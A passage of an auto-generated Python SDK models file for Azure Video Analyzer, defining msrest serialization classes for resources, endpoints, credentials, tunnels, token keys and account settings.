/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:ivar group_id: The private link resource group id.
:vartype group_id: str
:ivar required_members: The private link resource required member names.
:vartype required_members: list[str]
:param required_zone_names: The private link resource Private link DNS zone name.
:type required_zone_names: list[str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'group_id': {'readonly': True},
'required_members': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'group_id': {'key': 'properties.groupId', 'type': 'str'},
'required_members': {'key': 'properties.requiredMembers', 'type': '[str]'},
'required_zone_names': {'key': 'properties.requiredZoneNames', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkResource, self).__init__(**kwargs)
self.group_id = None
self.required_members = None
self.required_zone_names = kwargs.get('required_zone_names', None)
class PrivateLinkResourceListResult(msrest.serialization.Model):
"""A list of private link resources.
:param value: Array of private link resources.
:type value: list[~video_analyzer.models.PrivateLinkResource]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PrivateLinkResource]'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkResourceListResult, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class PrivateLinkServiceConnectionState(msrest.serialization.Model):
"""A collection of information about the state of the connection between service consumer and provider.
:param status: Indicates whether the connection has been Approved/Rejected/Removed by the owner
of the service. Possible values include: "Pending", "Approved", "Rejected".
:type status: str or ~video_analyzer.models.PrivateEndpointServiceConnectionStatus
:param description: The reason for approval/rejection of the connection.
:type description: str
:param actions_required: A message indicating if changes on the service provider require any
updates on the consumer.
:type actions_required: str
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'actions_required': {'key': 'actionsRequired', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkServiceConnectionState, self).__init__(**kwargs)
self.status = kwargs.get('status', None)
self.description = kwargs.get('description', None)
self.actions_required = kwargs.get('actions_required', None)
class Properties(msrest.serialization.Model):
"""Metric properties.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar service_specification: The service specifications.
:vartype service_specification: ~video_analyzer.models.ServiceSpecification
"""
_validation = {
'service_specification': {'readonly': True},
}
_attribute_map = {
'service_specification': {'key': 'serviceSpecification', 'type': 'ServiceSpecification'},
}
def __init__(
self,
**kwargs
):
super(Properties, self).__init__(**kwargs)
self.service_specification = None
class ResourceIdentity(msrest.serialization.Model):
"""The user assigned managed identity to use when accessing a resource.
All required parameters must be populated in order to send to Azure.
:param user_assigned_identity: Required. The user assigned managed identity's resource
identifier to use when accessing a resource.
:type user_assigned_identity: str
"""
_validation = {
'user_assigned_identity': {'required': True},
}
_attribute_map = {
'user_assigned_identity': {'key': 'userAssignedIdentity', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResourceIdentity, self).__init__(**kwargs)
self.user_assigned_identity = kwargs['user_assigned_identity']
class RsaTokenKey(TokenKey):
"""Required validation properties for tokens generated with RSA algorithm.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param kid: Required. JWT token key id. Validation keys are looked up based on the key id
present on the JWT token header.
:type kid: str
:param alg: Required. RSA algorithm to be used: RS256, RS384 or RS512. Possible values include:
"RS256", "RS384", "RS512".
:type alg: str or ~video_analyzer.models.AccessPolicyRsaAlgo
:param n: Required. RSA public key modulus.
:type n: str
:param e: Required. RSA public key exponent.
:type e: str
"""
_validation = {
'type': {'required': True},
'kid': {'required': True},
'alg': {'required': True},
'n': {'required': True},
'e': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'kid': {'key': 'kid', 'type': 'str'},
'alg': {'key': 'alg', 'type': 'str'},
'n': {'key': 'n', 'type': 'str'},
'e': {'key': 'e', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(RsaTokenKey, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.RsaTokenKey' # type: str
self.alg = kwargs['alg']
self.n = kwargs['n']
self.e = kwargs['e']
class SourceNodeBase(NodeBase):
"""Base class for topology source nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: RtspSource, VideoSource.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.RtspSource': 'RtspSource', '#Microsoft.VideoAnalyzer.VideoSource': 'VideoSource'}
}
def __init__(
self,
**kwargs
):
super(SourceNodeBase, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.SourceNodeBase' # type: str
class RtspSource(SourceNodeBase):
"""RTSP source allows for media from an RTSP camera or generic RTSP server to be ingested into a pipeline.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param transport: Network transport utilized by the RTSP and RTP exchange: TCP or HTTP. When
using TCP, the RTP packets are interleaved on the TCP RTSP connection. When using HTTP, the
RTSP messages are exchanged through long lived HTTP connections, and the RTP packages are
interleaved in the HTTP connections alongside the RTSP messages. Possible values include:
"Http", "Tcp".
:type transport: str or ~video_analyzer.models.RtspTransport
:param endpoint: Required. RTSP endpoint information for Video Analyzer to connect to. This
contains the required information for Video Analyzer to connect to RTSP cameras and/or generic
RTSP servers.
:type endpoint: ~video_analyzer.models.EndpointBase
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'endpoint': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'transport': {'key': 'transport', 'type': 'str'},
'endpoint': {'key': 'endpoint', 'type': 'EndpointBase'},
}
def __init__(
self,
**kwargs
):
super(RtspSource, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.RtspSource' # type: str
self.transport = kwargs.get('transport', None)
self.endpoint = kwargs['endpoint']
class TunnelBase(msrest.serialization.Model):
"""Base class for tunnel objects.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: SecureIotDeviceRemoteTunnel.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.SecureIotDeviceRemoteTunnel': 'SecureIotDeviceRemoteTunnel'}
}
def __init__(
self,
**kwargs
):
super(TunnelBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class SecureIotDeviceRemoteTunnel(TunnelBase):
"""A remote tunnel securely established using IoT Hub device information.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param iot_hub_name: Required. Name of the IoT Hub.
:type iot_hub_name: str
:param device_id: Required. The IoT device id to use when establishing the remote tunnel. This
string is case-sensitive.
:type device_id: str
"""
_validation = {
'type': {'required': True},
'iot_hub_name': {'required': True},
'device_id': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'iot_hub_name': {'key': 'iotHubName', 'type': 'str'},
'device_id': {'key': 'deviceId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(SecureIotDeviceRemoteTunnel, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.SecureIotDeviceRemoteTunnel' # type: str
self.iot_hub_name = kwargs['iot_hub_name']
self.device_id = kwargs['device_id']
class ServiceSpecification(msrest.serialization.Model):
"""The service metric specifications.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar log_specifications: List of log specifications.
:vartype log_specifications: list[~video_analyzer.models.LogSpecification]
:ivar metric_specifications: List of metric specifications.
:vartype metric_specifications: list[~video_analyzer.models.MetricSpecification]
"""
_validation = {
'log_specifications': {'readonly': True},
'metric_specifications': {'readonly': True},
}
_attribute_map = {
'log_specifications': {'key': 'logSpecifications', 'type': '[LogSpecification]'},
'metric_specifications': {'key': 'metricSpecifications', 'type': '[MetricSpecification]'},
}
def __init__(
self,
**kwargs
):
super(ServiceSpecification, self).__init__(**kwargs)
self.log_specifications = None
self.metric_specifications = None
class SinkNodeBase(NodeBase):
"""Base class for topology sink nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: VideoSink.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.VideoSink': 'VideoSink'}
}
def __init__(
self,
**kwargs
):
super(SinkNodeBase, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.SinkNodeBase' # type: str
self.inputs = kwargs['inputs']
class Sku(msrest.serialization.Model):
"""The SKU details.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param name: Required. The SKU name. Possible values include: "Live_S1", "Batch_S1".
:type name: str or ~video_analyzer.models.SkuName
:ivar tier: The SKU tier. Possible values include: "Standard".
:vartype tier: str or ~video_analyzer.models.SkuTier
"""
_validation = {
'name': {'required': True},
'tier': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'tier': {'key': 'tier', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Sku, self).__init__(**kwargs)
self.name = kwargs['name']
self.tier = None
class StorageAccount(msrest.serialization.Model):
"""The details about the associated storage account.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param id: Required. The ID of the storage account resource. Video Analyzer relies on tables,
queues, and blobs. The primary storage account must be a Standard Storage account (either
Microsoft.ClassicStorage or Microsoft.Storage).
:type id: str
:param identity: A managed identity that Video Analyzer will use to access the storage account.
:type identity: ~video_analyzer.models.ResourceIdentity
:ivar status: The current status of the storage account mapping.
:vartype status: str
"""
_validation = {
'id': {'required': True},
'status': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'ResourceIdentity'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(StorageAccount, self).__init__(**kwargs)
self.id = kwargs['id']
self.identity = kwargs.get('identity', None)
self.status = None
class SystemData(msrest.serialization.Model):
"""Metadata pertaining to creation and last modification of the resource.
:param created_by: The identity that created the resource.
:type created_by: str
:param created_by_type: The type of identity that created the resource. Possible values
include: "User", "Application", "ManagedIdentity", "Key".
:type created_by_type: str or ~video_analyzer.models.CreatedByType
:param created_at: The timestamp of resource creation (UTC).
:type created_at: ~datetime.datetime
:param last_modified_by: The identity that last modified the resource.
:type last_modified_by: str
:param last_modified_by_type: The type of identity that last modified the resource. Possible
values include: "User", "Application", "ManagedIdentity", "Key".
:type last_modified_by_type: str or ~video_analyzer.models.CreatedByType
:param last_modified_at: The timestamp of resource last modification (UTC).
:type last_modified_at: ~datetime.datetime
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'str'},
'created_by_type': {'key': 'createdByType', 'type': 'str'},
'created_at': {'key': 'createdAt', 'type': 'iso-8601'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'str'},
'last_modified_by_type': {'key': 'lastModifiedByType', 'type': 'str'},
'last_modified_at': {'key': 'lastModifiedAt', 'type': 'iso-8601'},
}
def __init__(
self,
**kwargs
):
super(SystemData, self).__init__(**kwargs)
self.created_by = kwargs.get('created_by', None)
self.created_by_type = kwargs.get('created_by_type', None)
self.created_at = kwargs.get('created_at', None)
self.last_modified_by = kwargs.get('last_modified_by', None)
self.last_modified_by_type = kwargs.get('last_modified_by_type', None)
self.last_modified_at = kwargs.get('last_modified_at', None)
class TimeSequenceBase(msrest.serialization.Model):
"""A sequence of datetime ranges as a string.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: VideoSequenceAbsoluteTimeMarkers.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.VideoSequenceAbsoluteTimeMarkers': 'VideoSequenceAbsoluteTimeMarkers'}
}
def __init__(
self,
**kwargs
):
super(TimeSequenceBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class TlsEndpoint(EndpointBase):
"""TLS endpoint describes an endpoint that the pipeline can connect to over TLS transport (data is encrypted in transit).
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param credentials: Required. Credentials to be presented to the endpoint.
:type credentials: ~video_analyzer.models.CredentialsBase
:param url: Required. The endpoint URL for Video Analyzer to connect to.
:type url: str
:param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint
URL. This is an optional property, typically used when the endpoint is behind a firewall.
:type tunnel: ~video_analyzer.models.TunnelBase
:param trusted_certificates: List of trusted certificate authorities when authenticating a TLS
connection. A null list designates that Azure Video Analyzer's list of trusted authorities
should be used.
:type trusted_certificates: ~video_analyzer.models.CertificateSource
:param validation_options: Validation options to use when authenticating a TLS connection. By
default, strict validation is used.
:type validation_options: ~video_analyzer.models.TlsValidationOptions
"""
_validation = {
'type': {'required': True},
'credentials': {'required': True},
'url': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'credentials': {'key': 'credentials', 'type': 'CredentialsBase'},
'url': {'key': 'url', 'type': 'str'},
'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'},
'trusted_certificates': {'key': 'trustedCertificates', 'type': 'CertificateSource'},
'validation_options': {'key': 'validationOptions', 'type': 'TlsValidationOptions'},
}
def __init__(
self,
**kwargs
):
super(TlsEndpoint, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.TlsEndpoint' # type: str
self.trusted_certificates = kwargs.get('trusted_certificates', None)
self.validation_options = kwargs.get('validation_options', None)
class TlsValidationOptions(msrest.serialization.Model):
"""Options for controlling the validation of TLS endpoints.
:param ignore_hostname: When set to 'true' causes the certificate subject name validation to be
skipped. Default is 'false'.
:type ignore_hostname: str
:param ignore_signature: When set to 'true' causes the certificate chain trust validation to be
skipped. Default is 'false'.
:type ignore_signature: str
"""
_attribute_map = {
'ignore_hostname': {'key': 'ignoreHostname', 'type': 'str'},
'ignore_signature': {'key': 'ignoreSignature', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TlsValidationOptions, self).__init__(**kwargs)
self.ignore_hostname = kwargs.get('ignore_hostname', None)
self.ignore_signature = kwargs.get('ignore_signature', None)
class TokenClaim(msrest.serialization.Model):
"""Properties for expected token claims.
All required parameters must be populated in order to send to Azure.
:param name: Required. Name of the claim which must be present on the token.
:type name: str
:param value: Required. Expected value of the claim to be present on the token.
:type value: str
"""
_validation = {
'name': {'required': True},
'value': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TokenClaim, self).__init__(**kwargs)
self.name = kwargs['name']
self.value = kwargs['value']
class TrackedResource(Resource):
"""The resource model definition for an Azure Resource Manager tracked top level resource which has 'tags' and a 'location'.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives.
:type location: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'location': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TrackedResource, self).__init__(**kwargs)
self.tags = kwargs.get('tags', None)
self.location = kwargs['location']
class UnsecuredEndpoint(EndpointBase):
"""Unsecured endpoint describes an endpoint that the pipeline can connect to over clear transport (no encryption in transit).
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param credentials: Required. Credentials to be presented to the endpoint.
:type credentials: ~video_analyzer.models.CredentialsBase
:param url: Required. The endpoint URL for Video Analyzer to connect to.
:type url: str
:param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint
URL. This is an optional property, typically used when the endpoint is behind a firewall.
:type tunnel: ~video_analyzer.models.TunnelBase
"""
_validation = {
'type': {'required': True},
'credentials': {'required': True},
'url': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'credentials': {'key': 'credentials', 'type': 'CredentialsBase'},
'url': {'key': 'url', 'type': 'str'},
'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'},
}
def __init__(
self,
**kwargs
):
super(UnsecuredEndpoint, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.UnsecuredEndpoint' # type: str
class UserAssignedManagedIdentity(msrest.serialization.Model):
"""The details of the user assigned managed identity used by the Video Analyzer resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar client_id: The client ID.
:vartype client_id: str
:ivar principal_id: The principal ID.
:vartype principal_id: str
"""
_validation = {
'client_id': {'readonly': True},
'principal_id': {'readonly': True},
}
_attribute_map = {
'client_id': {'key': 'clientId', 'type': 'str'},
'principal_id': {'key': 'principalId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(UserAssignedManagedIdentity, self).__init__(**kwargs)
self.client_id = None
self.principal_id = None
class UsernamePasswordCredentials(CredentialsBase):
"""Username and password credentials.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param username: Required. Username to be presented as part of the credentials.
:type username: str
:param password: Required. Password to be presented as part of the credentials. It is
recommended that this value is parameterized as a secret string in order to prevent this value
to be returned as part of the resource on API requests.
:type password: str
"""
_validation = {
'type': {'required': True},
'username': {'required': True},
'password': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'username': {'key': 'username', 'type': 'str'},
'password': {'key': 'password', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(UsernamePasswordCredentials, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.UsernamePasswordCredentials' # type: str
self.username = kwargs['username']
self.password = kwargs['password']
class VideoAnalyzer(TrackedResource):
"""The Video Analyzer account.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives.
:type location: str
:param identity: The identities associated to the Video Analyzer resource.
:type identity: ~video_analyzer.models.VideoAnalyzerIdentity
:param storage_accounts: The storage accounts for this resource.
:type storage_accounts: list[~video_analyzer.models.StorageAccount]
:ivar endpoints: The endpoints associated with this resource.
:vartype endpoints: list[~video_analyzer.models.Endpoint]
:param encryption: The account encryption properties.
:type encryption: ~video_analyzer.models.AccountEncryption
:param iot_hubs: The IoT Hubs for this resource.
:type iot_hubs: list[~video_analyzer.models.IotHub]
:param public_network_access: Whether or not public network access is allowed for resources
under the Video Analyzer account. Possible values include: "Enabled", "Disabled".
:type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess
:param network_access_control: Network access control for Video Analyzer.
:type network_access_control: ~video_analyzer.models.NetworkAccessControl
:ivar provisioning_state: Provisioning state of the Video Analyzer account. Possible values
include: "Failed", "InProgress", "Succeeded".
:vartype provisioning_state: str or ~video_analyzer.models.ProvisioningState
:ivar private_endpoint_connections: Private Endpoint Connections created under Video Analyzer
account.
:vartype private_endpoint_connections: list[~video_analyzer.models.PrivateEndpointConnection]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'location': {'required': True},
'endpoints': {'readonly': True},
'provisioning_state': {'readonly': True},
'private_endpoint_connections': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'VideoAnalyzerIdentity'},
'storage_accounts': {'key': 'properties.storageAccounts', 'type': '[StorageAccount]'},
'endpoints': {'key': 'properties.endpoints', 'type': '[Endpoint]'},
'encryption': {'key': 'properties.encryption', 'type': 'AccountEncryption'},
'iot_hubs': {'key': 'properties.iotHubs', 'type': '[IotHub]'},
'public_network_access': {'key': 'properties.publicNetworkAccess', 'type': 'str'},
'network_access_control': {'key': 'properties.networkAccessControl', 'type': 'NetworkAccessControl'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'private_endpoint_connections': {'key': 'properties.privateEndpointConnections', 'type': '[PrivateEndpointConnection]'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzer, self).__init__(**kwargs)
self.identity = kwargs.get('identity', None)
self.storage_accounts = kwargs.get('storage_accounts', None)
self.endpoints = None
self.encryption = kwargs.get('encryption', None)
self.iot_hubs = kwargs.get('iot_hubs', None)
self.public_network_access = kwargs.get('public_network_access', None)
self.network_access_control = kwargs.get('network_access_control', None)
self.provisioning_state = None
self.private_endpoint_connections = None
class VideoAnalyzerCollection(msrest.serialization.Model):
"""A collection of VideoAnalyzer items.
:param value: A collection of VideoAnalyzer items.
:type value: list[~video_analyzer.models.VideoAnalyzer]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[VideoAnalyzer]'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class VideoAnalyzerIdentity(msrest.serialization.Model):
"""The managed identity for the Video Analyzer resource.
All required parameters must be populated in order to send to Azure.
:param type: Required. The identity type.
:type type: str
:param user_assigned_identities: The User Assigned Managed Identities.
:type user_assigned_identities: dict[str, ~video_analyzer.models.UserAssignedManagedIdentity]
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'user_assigned_identities': {'key': 'userAssignedIdentities', 'type': '{UserAssignedManagedIdentity}'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerIdentity, self).__init__(**kwargs)
self.type = kwargs['type']
self.user_assigned_identities = kwargs.get('user_assigned_identities', None)
class VideoAnalyzerOperationStatus(msrest.serialization.Model):
"""Status of video analyzer operation.
All required parameters must be populated in order to send to Azure.
:param name: Required. Operation identifier.
:type name: str
:param id: Operation resource ID.
:type id: str
:param start_time: Operation start time.
:type start_time: str
:param end_time: Operation end time.
:type end_time: str
:param status: Operation status.
:type status: str
:param error: The error detail.
:type error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'str'},
'end_time': {'key': 'endTime', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerOperationStatus, self).__init__(**kwargs)
self.name = kwargs['name']
self.id = kwargs.get('id', None)
self.start_time = kwargs.get('start_time', None)
self.end_time = kwargs.get('end_time', None)
self.status = kwargs.get('status', None)
self.error = kwargs.get('error', None)
class VideoAnalyzerPrivateEndpointConnectionOperationStatus(msrest.serialization.Model):
"""Status of private endpoint connection operation.
All required parameters must be populated in order to send to Azure.
:param name: Required. Operation identifier.
:type name: str
:param id: Operation resource ID.
:type id: str
:param start_time: Operation start time.
:type start_time: str
:param end_time: Operation end time.
:type end_time: str
:param status: Operation status.
:type status: str
:param error: The error detail.
:type error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'str'},
'end_time': {'key': 'endTime', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerPrivateEndpointConnectionOperationStatus, self).__init__(**kwargs)
self.name = kwargs['name']
self.id = kwargs.get('id', None)
self.start_time = kwargs.get('start_time', None)
self.end_time = kwargs.get('end_time', None)
self.status = kwargs.get('status', None)
self.error = kwargs.get('error', None)
class VideoAnalyzerUpdate(msrest.serialization.Model):
"""The update operation for a Video Analyzer account.
Variables are only populated by the server, and will be ignored when sending a request.
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param identity: The identities associated to the Video Analyzer resource.
:type identity: ~video_analyzer.models.VideoAnalyzerIdentity
:param storage_accounts: The storage accounts for this resource.
:type storage_accounts: list[~video_analyzer.models.StorageAccount]
:ivar endpoints: The endpoints associated with this resource.
:vartype endpoints: list[~video_analyzer.models.Endpoint]
:param encryption: The account encryption properties.
:type encryption: ~video_analyzer.models.AccountEncryption
:param iot_hubs: The IoT Hubs for this resource.
:type iot_hubs: list[~video_analyzer.models.IotHub]
:param public_network_access: Whether or not public network access is allowed for resources
under the Video Analyzer account. Possible values include: "Enabled", "Disabled".
:type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess
:param network_access_control: Network access control for Video Analyzer.
:type network_access_control: ~video_analyzer.models.NetworkAccessControl
:ivar provisioning_state: Provisioning state of the Video Analyzer account. Possible values
include: "Failed", "InProgress", "Succeeded".
:vartype provisioning_state: str or ~video_analyzer.models.ProvisioningState
:ivar private_endpoint_connections: Private Endpoint Connections created under Video Analyzer
account.
:vartype private_endpoint_connections: list[~video_analyzer.models.PrivateEndpointConnection]
"""
_validation = {
'endpoints': {'readonly': True},
'provisioning_state': {'readonly': True},
'private_endpoint_connections': {'readonly': True},
}
_attribute_map = {
'tags': {'key': 'tags', 'type': '{str}'},
'identity': {'key': 'identity', 'type': 'VideoAnalyzerIdentity'},
'storage_accounts': {'key': 'properties.storageAccounts', 'type': '[StorageAccount]'},
'endpoints': {'key': 'properties.endpoints', 'type': '[Endpoint]'},
'encryption': {'key': 'properties.encryption', 'type': 'AccountEncryption'},
'iot_hubs': {'key': 'properties.iotHubs', 'type': '[IotHub]'},
'public_network_access': {'key': 'properties.publicNetworkAccess', 'type': 'str'},
'network_access_control': {'key': 'properties.networkAccessControl', 'type': 'NetworkAccessControl'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'private_endpoint_connections': {'key': 'properties.privateEndpointConnections', 'type': '[PrivateEndpointConnection]'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerUpdate, self).__init__(**kwargs)
self.tags = kwargs.get('tags', None)
self.identity = kwargs.get('identity', None)
self.storage_accounts = kwargs.get('storage_accounts', None)
self.endpoints = None
self.encryption = kwargs.get('encryption', None)
self.iot_hubs = kwargs.get('iot_hubs', None)
self.public_network_access = kwargs.get('public_network_access', None)
self.network_access_control = kwargs.get('network_access_control', None)
self.provisioning_state = None
self.private_endpoint_connections = None
class VideoArchival(msrest.serialization.Model):
"""Video archival properties.
:param retention_period: Video retention period indicates the maximum age of the video archive
segments which are intended to be kept in storage. It must be provided in the ISO8601 duration
format in the granularity of days, up to a maximum of 10 years. For example, if this is set to
P30D (30 days), content older than 30 days will be periodically deleted. This value can be
updated at any time and the new desired retention period will be effective within 24 hours.
:type retention_period: str
"""
_attribute_map = {
'retention_period': {'key': 'retentionPeriod', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
